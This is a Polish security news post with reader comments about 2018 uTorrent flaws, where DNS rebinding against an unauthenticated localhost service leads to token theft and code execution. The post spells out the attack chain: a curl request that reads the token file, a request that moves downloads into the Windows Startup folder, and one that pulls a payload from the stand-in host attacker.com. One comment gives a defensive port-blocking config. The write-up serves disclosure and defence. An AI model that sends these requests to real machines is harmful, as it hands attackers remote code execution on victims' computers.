uTorrent – można sprawdzać jakie pliki pobrałeś/ściągać. Bonus – wykonanie dowolnego kodu na Twoim kompie.

21 lutego 2018, 10:00 | W biegu | komentarzy 7
: zin o bezpieczeństwie - pobierz w pdf/epub/mobi.

Podatności nie są jeszcze do końca załatane. Problemy sprowadzają się do dostępnych na localhost usług, startowanych przez uTorrent, które de facto dostępne są bez uwierzytelnienia. Tzn. pardon, niby są:

http://127.0.0.1:19575/gui/index.html?localauth=localapic3cfe21229a80938:

Widzicie ten localauth? … ale można go odzyskać (przez DNS rebinding, podobna historia była niedawno w grach Blizzarda) korzystając z nieuwierzytelnionego zasobu tutaj:

curl -si http://localhost:19575/users.conf

Mając już ten token można zmienić katalog do którego będą wygrane nowe pliki z torrentów: http://127.0.0.1:19575/gui/?localauth=token:&action=setsetting&s=dir_active_download&v=C:/Users/All%20Users/Start%20Menu/Programs/Startup

i na koniec ściągnąć binarkę z serwera atakującego: http://127.0.0.1:19575/gui/?localauth=token:&action=add-url&url=http://attacker.com/calc.exe.torrent

Wszystko to w uTorrent web (czyli webowym interfejsie do klienta), a do skutecznego ataku wymagane jest aby ofiara weszła na odpowiednio przygotowaną stronę atakującego.

Podobne problemy mamy w uTorrent Classic – choć tutaj można „tylko” – enumerować ściągnięte przez użytkownika pliki czy je w sposób nieautoryzowany pobierać. Również tutaj wymagane jest wejście ofiary na odpowiednio spreparowaną stronę:

Listowanie/pobieranie plików.

–ms

Spodobał Ci się wpis? Podziel się nim ze znajomymi:Komentarze

 1. Sebastian

  Ktoś w ogóle używa windowsa i µtorrenta jak nie jest zmuszony?
  Swoją drogą nie potrafię sobie wyobrazić bycia zmuszonym do używania tego drugiego :P

  Odpowiedz
  • zero one

   Używam obydwu. Regularnie i żeby było ciekawiej stare wersje jednego i drugiego. :-)

   Odpowiedz
  • Hmm

   To sciagnij 1 TB Tablic Teczowych na necie 8 Mbit xxD Czekamy na filmik jak tego dokonasz na downloaderze przegladarki..

   Odpowiedz
   • zero one

    @hmm Ty do mnie pisałeś? I jakie „czekamy”? Czyżby zaburzenie dysocjacyjne tożsamości? :-D

    Odpowiedz
 2. gosc

  Nalezy pamiętać takze zeby nie sciagać z nie zaufanych stron, także bez torenta. :)
  Bo możemy się nadziać na jakiś urząd spisujący IP które pobierają plik w celu np. walki z piractwem, a w najgorszym przypadku na trojana.

  Poza tym pobieranie pliku pakietami i automatyczne sprawdzanie sumy kontrolnej pakietów i pliku, to chyba jedna z największych zalet Torrenta,
  dziwię się że wiele serwisów nie skopiowało tej technologii.

  Odpowiedz
 3. As

  Dlatego dodatkowy sanbox dla przeglądarki internetowej, która ma już sandboxa w sobie jest jak najbardziej na miejscu.
  uTorrent Classic odpalony poza piaskownica, Chrome odpalony w Sandboxie, crash test przez RPC na localhost:10000 przebiegl poprawnie, uTorrent wycrashowal sie. DNS rebind attack rebind z enumeracja pobranych plikow rowniez dziala po dns clear cache zeby nie czekac za dlugo.

  W konfiguracji Sandboxie w pliku templates.ini dopisujemy ten port (oraz do web clienta jak ktos uzywa) jako blokowany dla aplikacji odpalanych w tej piaskownicy w poniższej sekcji (czyli sandbox dla przegladarek internetowych):

  [Template_BlockPorts]
  Tmpl.Title=#4293
  Tmpl.Class=Misc
  BlockPort=21,22,137,138,139,445,10000,19575

  Efekt wiadomy, kazda przegladarka odpalana w tej piaskownicy dostanie timeout przy probie laczenia sie na te porty naszego hosta i wszystkie przedstawione ataki nie działają, nie trzeba czekać na łatkę, feel safe ;).

  Ogólnie polecam podwójne sandboxowanie browserów, bo to zawsze dodatkowa warstwa ochronna. Jak ktos znajdzie exploita na wyskoczenie z sandboxa chroma to i tak bedzie siedzial w piaskownicy sanboxie i zbyt wiele 0day na samego chroma nie zrobi.
  „Dodatkowa warstwa ochronna na pewno nie zaszkodzi” tak okreslil podwojne sanboxowanie chrome Gynvael Coldwind ;)

  Odpowiedz
 4. Kefas

  Jeżeli sobie wytnę w systemowym firewallu port 10000 w obie strony (webowego interfejsu nie używam) to czy będę bezpieczny?

  Odpowiedz

Odpowiedz